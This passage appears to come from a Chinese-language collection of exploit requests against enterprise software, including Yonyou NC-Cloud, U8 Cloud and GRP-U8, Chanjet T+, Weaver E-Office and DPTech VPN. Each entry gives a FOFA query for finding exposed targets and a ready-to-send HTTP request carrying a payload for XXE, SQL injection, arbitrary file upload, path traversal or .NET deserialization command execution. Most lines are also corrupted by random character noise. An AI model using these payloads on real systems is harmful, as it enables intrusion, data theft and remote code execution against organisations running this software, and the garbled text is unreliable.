2 R& f f5 |! j8 GFOFA:app="用友-NC-Cloud"
2 {. D/ B7 B. J+ {. C* V0 I* x5 Y, p# tPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
9 d! y: C6 H7 y; L {* F/ N1 l% d0 \- X7 JHost: 203.25.218.166:8888/ @# M! g- r: H" a9 ]
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info( ~ g' h; S/ [: S X$ }" j8 A. ?- n9 k
Accept-Encoding: gzip, deflate, x9 \; ]$ B- B( u
Accept: */*
9 d# \2 t; A- Z* yConnection: close
8 @( K/ a9 F) {. A1 J/ X4 jaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA3 ]8 o- f L, Y8 O# a
Content-Length: 190+ }- \5 L0 F, e7 Q) ^
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0* R! q& D5 g% s; v5 ~% C% j" c
3 q/ G+ M9 t4 } J% R* e. z% _* a
--fd28cb44e829ed1c197ec3bc71748df0" u( _6 R/ B N
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"! K& j; L6 L( ~2 f
. B& f8 R9 Y8 Q9 `( R6 D- @<%out.println(1111*1111);%>
6 }7 o/ t8 I( a+ v) O--fd28cb44e829ed1c197ec3bc71748df0--, P+ H K' V- e5 H, l
: q# X. s* K& w6 d. f! B5 U( W- h
5 w' r; u6 T: `2 P( e36. 用友NC-Cloud soapFormat XXE
* Y+ @$ k: s& IFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
5 y- p, x6 d& @ U1 F5 V4 gPOST /uapws/soapFormat.ajax HTTP/1.1/ N2 e' N0 c. K3 }
Host: 192.168.40.130:89894 U! y; p5 l$ C' a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0( c* | V$ [9 d5 F6 y: o
Content-Length: 263% ?2 ]0 N+ Y# i, a. e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 C- P: m2 ]5 |# \" n# ~Accept-Encoding: gzip, deflate
* G# i6 u7 @. `+ bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 ^* p) _! B" t* V
Connection: close' m5 f" U3 j7 u$ {( V2 F" W* ]! a
Content-Type: application/x-www-form-urlencoded
2 b! j' ~% |# h* ^; {' xUpgrade-Insecure-Requests: 1! _# V5 e! a: o
1 `: V: @! c* I$ m! ]# q
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
! P0 c A/ x' I! Q3 p+ q# ^# T4 E& i6 X4 M7 y( r G5 R
0 J4 |' W8 _; \* t- x) w
37. 用友NC-Cloud IUpdateService XXE
+ ^4 V) P" G% U. iFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"; h3 M+ A. ^5 F$ h' l* J, P# M# c
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
: I: I5 ]+ U4 J% y: f8 aHost: 192.168.40.130:8989
$ r8 V" f0 p3 m: H4 {3 x/ r5 e( oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
! ?6 d" i. p N& L7 G, Y' f# WContent-Length: 4210 p9 `( c# d$ F1 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- ?/ p! O5 @# S2 J+ d
Accept-Encoding: gzip, deflate0 j9 {$ f+ c7 x) t8 z
Accept-Language: zh-CN,zh;q=0.91 H+ x' u/ w, X% O# I% o" X3 I" X: M
Connection: close% p4 m8 G. Q! z3 u# Y6 X
Content-Type: text/xml;charset=UTF-8; O0 B% s" \! p3 k% ]7 T3 j- S( A
SOAPAction: urn:getResult. g* X) s" @ {
Upgrade-Insecure-Requests: 1
4 w9 k- S! C$ l9 {; X8 K) U) Z6 A7 r4 s+ q, R F
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
/ q2 }$ c# k4 c) w+ F. |<soapenv:Header/># @, i; d9 r* X$ e, T
<soapenv:Body>
0 \; f; V F3 Y* }6 n<iup:getResult>& C7 U8 ]& K c/ ^, [
<!--type: string-->* w& Q' w: |, @( \$ X" w, [1 D4 s
<iup:string><![CDATA[
# c& S; j+ d# \; @<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
; s- ^+ Q( n7 ~" [<xxx/>]]></iup:string>; V( u/ W6 o( m+ ~) w4 t5 G
</iup:getResult>" @% t) P( s/ Y, _
</soapenv:Body># X T5 T8 F8 Y0 O$ C/ `
</soapenv:Envelope>
1 O- [. @$ R& k3 a. }0 A1 L+ R( c6 R. v" h
( X2 D# V+ e) e7 i9 N" N% a3 o+ ?
9 a- {9 ?8 |2 Z38. 用友U8 Cloud smartweb2.RPC.d XXE5 C: L# x% u5 u% t6 w W
FOFA:app="用友-U8-Cloud"
7 y* ~3 i7 v% I2 `+ l" ZPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.11 [+ y7 p( |5 S2 E, _8 G% s
Host: 192.168.40.131:8088& f: U$ d+ s: b7 l+ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
8 Q7 h& k+ h- l R2 M# CContent-Length: 260
. l+ V% j# G3 H" e2 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
" K- ]9 n+ M) t9 i3 `Accept-Encoding: gzip, deflate
5 e- y8 Y d9 x% T/ W! CAccept-Language: zh-CN,zh;q=0.9( @: ]$ x* o# c; M; [" C4 J+ Z' C4 ?- E4 x
Connection: close0 ?( Z) r; M& t
Content-Type: application/x-www-form-urlencoded# P8 p! S4 X7 s+ N
7 G4 D' w: R' s/ a) p0 c" S0 k& Y
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
5 c- R3 n3 `9 \9 x q. M6 U- a+ i' X' k) o' |( C
' K: D$ H N: _1 C k& I
39. 用友U8 Cloud RegisterServlet SQL注入
! d" J% K5 s9 D7 |FOFA:title="u8c"6 ^$ ]! x; N4 M
POST /servlet/RegisterServlet HTTP/1.1
6 t5 |6 e# T' e) ~% z$ [ ]Host: 192.168.86.128:8089
" x: w* K. {1 F: l; b% [! e( rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 r: q! U- n- h( R- y! Z. y
Connection: close" I# C6 ]* D. f" |' x7 f" ^5 A0 |
Content-Length: 85
. v9 g! B( z) d% c2 n& W+ X; kAccept: */*
5 n5 J/ b |( F3 q% z" T: YAccept-Language: en5 V4 }5 @1 s( c8 r1 @4 d! ]1 i% s
Content-Type: application/x-www-form-urlencoded3 L5 J# i! N/ S; ]
X-Forwarded-For: 127.0.0.14 m+ U9 O c0 J, b6 E8 M: z6 Z J
Accept-Encoding: gzip9 \6 b+ ^7 E( z" n
) l+ J( p9 E/ v. {usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
: a' a3 s1 Y" G: L: ~9 o1 C' `- y* c* a+ V: O: N
( n( H4 }( `! u; B: ]6 E5 L7 R. Y) V: W
40. 用友U8-Cloud XChangeServlet XXE; _- n5 _; Q$ F0 p
FOFA:app="用友-U8-Cloud"
( I4 p* F1 J0 v" }0 a2 I0 KPOST /service/XChangeServlet HTTP/1.1
+ H, {+ h0 h# u+ ~Host: x.x.x.x
! O) G6 e e9 ~9 o$ NUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.364 k! I! O+ a- G/ c1 _2 B9 a6 d) Q7 p
Content-Type: text/xml; B# Z: T" ^: O) s: ~! f; ]6 _5 L
Connection: close% P6 s) [: e& K+ i
, G, Y( V8 f a! Z<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>& n# \2 S5 g4 m8 n1 ~; j4 o4 p1 i
( ~, z' h% H' |9 @4 |. i# m5 }( u9 S% @/ U
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入4 f. p2 {' e/ e& h# u8 f5 |. k
FOFA:app="用友-U8-Cloud"
$ N+ b' x1 U7 e8 rGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1& l3 F7 O% p$ @" U2 A5 q
Host:
, T+ J: ]& g, c3 S4 n5 b7 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# b3 {' K- D, h6 L* s) \1 X0 c
Content-Type: application/json9 r* b2 Z# b: t9 n
Accept-Encoding: gzip
& o0 K0 G6 j7 ^9 ?6 @Connection: close& w2 |5 h# p- W8 z2 q) V6 k
& k/ D0 ]" A1 G$ ~6 I R
. y( P! A! ~2 I" L, O& h- l# V42. 用友GRP-U8 SmartUpload01 文件上传
: N! k [1 ]1 Y0 O" e# ZFOFA:app="用友-GRP-U8"
% e; I7 y% z7 X7 a" qPOST /u8qx/SmartUpload01.jsp HTTP/1.1
0 q+ c5 m, y9 X4 ~Host: x.x.x.x
$ [% e# t) L* [- c) P6 fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt' m. A7 L8 |2 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
9 m, K* O+ ~4 {9 X3 H; r
) U) T; H' d; {" R# S8 YPAYLOAD- z) {1 }2 G' F4 a
- j+ _+ ]& e8 y# |
9 B- }8 U3 J. ]( F5 K+ K; |" r7 Khttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml1 v. C! Q; U/ R
0 l9 e( y4 p3 H2 `
43. 用友GRP-U8 userInfoWeb SQL注入致RCE2 T& Z0 P* e2 |4 C
FOFA:app="用友-GRP-U8"; y! J6 y# |$ s3 t' C: [
POST /services/userInfoWeb HTTP/1.1
, s* \: v9 A: k$ _# x5 x+ {Host: your-ip+ b* p! G7 q" l# n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.362 u& [' r+ W4 i3 e5 w1 z8 A$ b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- v! O1 o7 C, b% S3 I: Y R' u
Accept-Encoding: gzip, deflate0 I# D" r9 i7 L4 q" S
Accept-Language: zh-CN,zh;q=0.9
! T9 l% X2 k$ u7 Z& t C* RConnection: close: x& w/ H# ?: u; c7 W: O) h, H
SOAPAction:( d% x8 ?: v* K+ Y! T: [2 Y
Content-Type: text/xml;charset=UTF-8, O* j8 {4 q0 \- M* h# s' u+ {0 v
" M1 E4 M# z; b+ ^' E<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">3 w" e n( M W& Y% h; u- p; Q
<soapenv:Header/>2 G7 e$ c4 s3 m( W8 c1 s! q- m4 A- Y
<soapenv:Body>
' l' X* m! I( ~6 e9 [ <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
# t) y% z2 u0 S <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>/ O) A/ ]( d( G/ p8 Q
</ser:getUserNameById>
$ T d4 [" I4 } </soapenv:Body>
0 j- h" h- \; P3 h; T: ]</soapenv:Envelope>
7 d) j" |7 [1 p! u; S
% Q5 w7 T: t) d& J/ X$ h: T
! ]" x. o. s0 d$ L44. 用友GRP-U8 bx_dj_check.jsp SQL注入, K+ z2 v+ V9 g/ E% {
FOFA:app="用友-GRP-U8"
. g/ l) Q& d) {4 AGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
i& L% r& Q7 x" b, ?7 Q9 \9 cHost: your-ip
/ T8 I, ~7 | V% g( t& U6 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36! W1 c6 v" I1 ]8 _! S( [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% |/ v6 p' S& h3 t0 p2 W
Accept-Encoding: gzip, deflate
5 p2 }2 d' A8 \1 X* aAccept-Language: zh-CN,zh;q=0.9
x3 K H* q: f3 L: ?2 b2 K$ vConnection: close* G/ a* S/ g' J6 ]* U# A
" ^* p- U. `2 W$ _8 C' D
& J6 i& z# z4 a ^" Y45. 用友GRP-U8 ufgovbank XXE1 |: v8 h# c9 }) f1 C/ Q9 ^* O
FOFA:app="用友-GRP-U8"& V9 H9 z9 A' F1 D( }' ^
POST /ufgovbank HTTP/1.1
: Z Z1 i9 V, X$ R3 [6 o4 M; oHost: 192.168.40.130:222 v D U( y- A$ o! `% u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
; r6 {, r: L8 T1 P' KConnection: close. \$ @! `' m) U2 X. n/ U5 V
Content-Length: 161
. R3 w& P2 l* p" eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# u* M; j7 q9 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 G/ K9 ^- ]' @8 P9 [9 LContent-Type: application/x-www-form-urlencoded
8 l$ j4 ~! v, d8 AAccept-Encoding: gzip
' A7 ?% r$ f! f- f, B5 L
, @* N/ Y) _: `+ C) [2 @, ^7 ?reqData=<?xml version="1.0"?>" G# m$ K8 s+ `5 K8 F8 Q
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
/ G5 _2 Q4 ]5 s
# _ o' }1 W: \/ g6 b$ Y" d
) `. ~0 a b8 S8 X6 e" E46. 用友GRP-U8 sqcxIndex.jsp SQL注入6 d; Q; j" y5 n n- P, H l
FOFA:app="用友-GRP-U8"& D3 a' E% \7 i$ {8 k @
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.14 C& a. a3 E. i8 I5 G) d
Host: your-ip6 }6 E. N% h- U% m e( \( D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36. L# b7 z- {3 r$ H2 f3 N- k# }. E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 g( h+ w; V; [Accept-Encoding: gzip, deflate7 d7 v$ L" i, e2 o9 e8 [
Accept-Language: zh-CN,zh;q=0.9
2 c4 X& a# ?& mConnection: close y& S1 K+ N4 G) ]8 m( {! |7 _' R
5 V& v6 v+ H* F- ~9 a3 b
# h1 E. b0 f8 Y) v6 r! j47. 用友GRP A++Cloud 政府财务云 任意文件读取
, U3 k+ \; T! }9 ^FOFA:body="/pf/portal/login/css/fonts/style.css"' @( b2 r8 Q+ D0 {9 V* {& U
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.16 @ V( o5 W) A1 S, X7 Y
Host: x.x.x.x! t7 A7 F0 V# s6 P% |; O' u2 s0 Q
Cache-Control: max-age=0' Q- C0 x7 ~6 Z6 y% ]
Upgrade-Insecure-Requests: 10 j% Y2 ^& K# ^6 P9 A9 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
: r" c4 t6 w: T$ w# k, c7 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 {: d9 a- j7 v* P7 b9 s# eAccept-Encoding: gzip, deflate, br
8 n/ ~' r+ s$ rAccept-Language: zh-CN,zh;q=0.9
Y. h& k0 i! i9 `+ ?; z# W6 ?. WIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT7 \2 A# d/ i5 L8 @7 b% C% u
Connection: close+ x% R2 M; h. h* [0 y' u5 ?
+ J$ I5 [! _$ g: a
* m N& c3 x+ p% d+ B! K, e6 C, t4 L" i% C; U* X7 ^$ R6 V
48. 用友U8 CRM swfupload 任意文件上传
9 H* _7 E1 x" c& ^) iFOFA:title="用友U8CRM"& L3 e& o& j9 h; c4 S
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1, o: x. f5 J9 n C
Host: your-ip" r' S! _' f# v; O$ c7 N: V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, m# \8 M7 B, u5 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- `& @$ J6 S8 Y3 O/ O7 K0 BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( F. b. k) e, Y/ PAccept-Encoding: gzip, deflate" @9 I6 |5 q) \! ~5 |+ M5 S
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
' @# d- X9 J/ b4 N------269520967239406871642430066855
- a: b8 {% Z# Y& b4 CContent-Disposition: form-data; name="file"; filename="s.php"
1 [: o) Q6 s4 N1231
s, A, V. z6 z7 O! I& UContent-Type: application/octet-stream
" |( P. C8 v4 h9 I9 v------269520967239406871642430066855
) p7 w- H6 a! vContent-Disposition: form-data; name="upload"
* j% f, \! r* K. K3 x# `upload
2 }0 r% E; w# _ F+ M) y9 @------269520967239406871642430066855--8 X* \9 d& H& Q, z
4 d7 M d+ ]- Y0 n# P0 I' ^; k! p# R$ f+ [
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
5 U5 j& p1 b+ I3 |) Y( N+ ^ w; RFOFA:body="用友U8CRM": p H! ]8 k" ?% L) x' f; b
- b& E( k+ i* S. Q7 wPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1" R# I ?$ }0 q6 V6 o2 t: ~; v
Host: x.x.x.x4 @0 Q8 V" r# V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! _- m4 F/ ?, d! e; k6 }; ]4 J
Content-Length: 329' y8 Q; r, j6 N2 C2 {* Z& J& p2 n+ S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 b# _2 R9 y1 [Accept-Encoding: gzip, deflate2 X9 L3 K Z \$ q' L7 W ~& q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- S" z0 Z0 |# vConnection: close9 Z6 ~0 w& Y( i' l6 k4 @
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
5 b9 V# ]6 e! [% J4 m! U% H& @4 \$ ]- m( m
-----------------------------vvv3wdayqv3yppdxvn3w% l0 j. r2 I- N* }
Content-Disposition: form-data; name="file"; filename="%s.php "
u! s; m) c* g, |2 K2 q* kContent-Type: application/octet-stream
% N# L# {: ?" l( P: Q. Q+ I7 p! Q% R: o1 |
wersqqmlumloqa
! V0 C& j& a- M+ a% A! ~-----------------------------vvv3wdayqv3yppdxvn3w9 A' l; I9 W1 t5 d$ N
Content-Disposition: form-data; name="upload"
" C5 I) E+ f# A# a5 }( P; n' u' y/ D) Z7 A) v
upload, t% u( L, |8 K; j8 W1 H, _
-----------------------------vvv3wdayqv3yppdxvn3w--
9 p w5 L7 c% v8 l* j- o: P* c1 m9 Z9 }
6 d& {2 E* ]2 X# o. }: A+ Yhttp://x.x.x.x/tmpfile/updB3CB.tmp.php3 @7 ?% d g" P$ s l& ?
+ \. K ]2 x% s50. QDocs Smart School 6.4.1 filterRecords SQL注入
`8 u8 d6 ^) S1 R+ H& e% EFOFA:body="close closebtnmodal"
' H6 o( k+ k/ p7 E, h; v: RPOST /course/filterRecords/ HTTP/1.1
- V4 u0 f+ m+ R; s) y0 b$ L6 C5 e. UHost: x.x.x.x) ~8 `0 L, x9 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
) C# h; k6 |$ Y, M+ PConnection: close( @! d- p3 L& \
Content-Length: 224
" O6 t& ]' @0 c( h4 iAccept: */*6 d% r) V# [! `. ?7 B( C- e
Accept-Language: en* z8 _/ l. ?8 J3 V+ n) |
Content-Type: application/x-www-form-urlencoded* O* E6 d ]! ~' H9 l( Q% _ z: j- |
Accept-Encoding: gzip$ n5 K- [5 |. z, e
# M! o( w( D9 A9 Rsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
' x6 i3 X" c. Y$ q$ S# d( h T7 o& |5 z" ] c9 P/ O
0 ]8 |4 f5 W/ Z: v) H# n51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入1 L) n! {# Y' E E# \& x, }: H
FOFA:app="云时空社会化商业ERP系统"0 [1 k, J4 M9 V. L3 K5 y
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
, B# N/ b) A9 q" K8 H+ F$ nHost: your-ip
/ @$ b- B' k) h- G* g BUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
7 K0 H! p& ]+ {; z8 t, V3 d" VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) \4 Y/ H: o8 h$ H' {* C
Accept-Encoding: gzip, deflate
: p$ l; w9 d* X# ? \Accept-Language: zh-CN,zh;q=0.9# y( ?0 l- w/ ^9 w" t
Connection: close& Y8 \: a0 u8 p) l& F% _
& e. W( U: m) R, M( i: ?! \
v; s* \7 t% a9 r, r- d- ?7 y52. 泛微E-Office json_common.php sql注入0 x5 M+ z1 M) x
FOFA:app="泛微-EOffice". a8 M& ]+ i8 ?2 f) S% M
POST /building/json_common.php HTTP/1.16 x" I8 a7 c/ L
Host: 192.168.86.128:80970 g9 k* t r4 z, J
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% n4 Y6 X4 C3 ^9 R/ C4 r' X
Connection: close6 }% f1 a$ C: U0 p9 C
Content-Length: 87
! q6 p- v0 O. C7 Z- Z6 CAccept: */*
6 ?6 ?3 \; a8 s8 k+ ]1 PAccept-Language: en
' o" P4 V+ W/ ]" _7 AContent-Type: application/x-www-form-urlencoded0 Q( ~! d* F+ K
Accept-Encoding: gzip1 ~6 p1 H/ S# Y3 ]
: R- D% f1 a. M7 o, p: u/ Ttfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333- B9 [: p7 T1 B7 A1 c
( v( G o5 H" d$ a- B
o! j7 L6 b" L1 |: e53. 迪普 DPTech VPN Service 任意文件上传
) i9 p2 I5 e$ G4 C* G7 d2 s/ ?* pFOFA:app="DPtech-SSLVPN"
* e9 h. Z% V; S& D/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
6 @6 q- [3 J( b5 g6 |% ?- O' t! @- {4 X* U! H5 `
9 C7 A% X+ @6 ~' b6 U
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
$ Z* z0 Y! P7 g9 XFOFA:app="畅捷通-TPlus"/ [% z2 B- b6 y# i1 f6 S7 M
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件2 F& p+ N% n( q# D9 `0 {% W! R" p
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt" s3 x5 L# T- U3 r4 I% n- |1 I0 i! R; R
. [8 V/ o4 N6 W* M1 a( Q
! a( `* r% Z* e
完整数据包
* y1 Y" z9 U7 C! Y4 G/ YPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
$ `! f' a ~0 q) ^9 lHost: x.x.x.x
' m/ A- ?6 r5 f# Q2 V1 b) `5 ?' U iUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F6 _) C% N. b) Z, F
Content-Length: 593: n( d. ^3 x h$ K
3 o0 W; a) v- K. N
{
7 ~& |. _# g0 ~3 e8 K" f"storeID":{
. m% S% |2 t0 L I7 F "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
' O6 ^2 P5 p/ D( c# S( q "MethodName":"Start",
- Y5 u. x/ F+ Q3 F# ~$ V; A "ObjectInstance":{( W6 T0 j9 w0 ]. u0 Z
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",$ ]2 }8 ?& }2 ?; m; L8 _
"StartInfo":{( f( a: R8 v8 J' F) s
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",# d8 f) n }/ h# O! s' [
"FileName":"cmd",$ N9 H+ U; B a0 R& Z5 _
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"5 z5 g# ~% W" \0 `; w
}
, q2 r1 w9 C+ z. j8 O3 H }
/ W. E* _; b+ W$ r) t }% N( j! @& e5 @1 `+ {. J+ x o
}
" p) k& G# E+ E7 C f7 v# W. o9 J2 r$ x$ v: y0 k3 _3 P
; [0 r; P) X$ p2 M第二步,访问如下url
" N7 o9 Z* g. ?) K/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
5 p. T( x$ \; [" h" w" }5 o
, \8 n1 u; A; U& ?, G+ w! A0 I# J0 m' a5 n/ m
55. 畅捷通T+ getdecallusers信息泄露
4 b+ ~3 D5 Z# H* ]: Q1 \% E0 s8 uFOFA:app="畅捷通-TPlus"+ G! x. L% x; Z2 M# ^" M
第一步,通过
% ]% L# E; p1 K ]" S/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie1 @" X7 G# O. w7 i5 e2 C) N% N( v
第二步,利用获取到的Cookie请求1 I& b7 [; O' J3 f ? y, z
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers: B* z4 A# ]' P2 ~9 I
' m$ ^3 m1 [# G5 t: u3 I) U56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE H; i' P6 h& F3 a, |, Q
FOFA: app="畅捷通-TPlus", o8 g% U4 j' g3 f! L
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.17 G5 C- `# p; ~: M1 U
